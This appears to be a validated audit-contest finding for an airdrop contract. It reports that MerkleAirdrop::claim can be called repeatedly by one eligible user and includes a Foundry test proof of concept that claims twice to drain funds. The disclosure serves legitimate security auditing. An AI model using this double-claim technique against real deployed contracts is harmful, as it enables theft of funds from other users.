First Flight #14: AirDropper
First Flight #14
Beginner FriendlyDeFiFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Eligible user can claim money more than once, until there are no money

petersr

Description: Function MerkleAirdrop::claim can be call by eligible user more than once. The intetion
of this function is to be used by user to claim money using merkle tree validation, but after sending money to
an user, same user can call it again and again until thera are no money left.

Impact: Money can be drained just by one eligible user.

Proof of Concept: Below you can see a test that you can add to the MerkleAirdropTest.t.sol and run it.
This test is calling the claim function two times with the same user, expecting to have just one prize, but
both of claim calls were successful!

  1. Add this test to test solidity file

function testUsersCanClaimMultipleTimes() public {
uint256 startingBalance = token.balanceOf(collectorOne);
vm.deal(collectorOne, airdrop.getFee() * 2);
vm.startPrank(collectorOne);
airdrop.claim{value: airdrop.getFee()}(
collectorOne,
amountToCollect,
proof
);
vm.stopPrank();
vm.startPrank(collectorOne);
airdrop.claim{value: airdrop.getFee()}(
collectorOne,
amountToCollect,
proof
);
vm.stopPrank();
uint256 endingBalance = token.balanceOf(collectorOne);
assertEq(endingBalance - startingBalance, amountToCollect * 2);
}

  1. Run this command

forge test

Recommend mitigation: Protect the claim function to be called by one user just one time!

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

multi-claim-airdrop

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.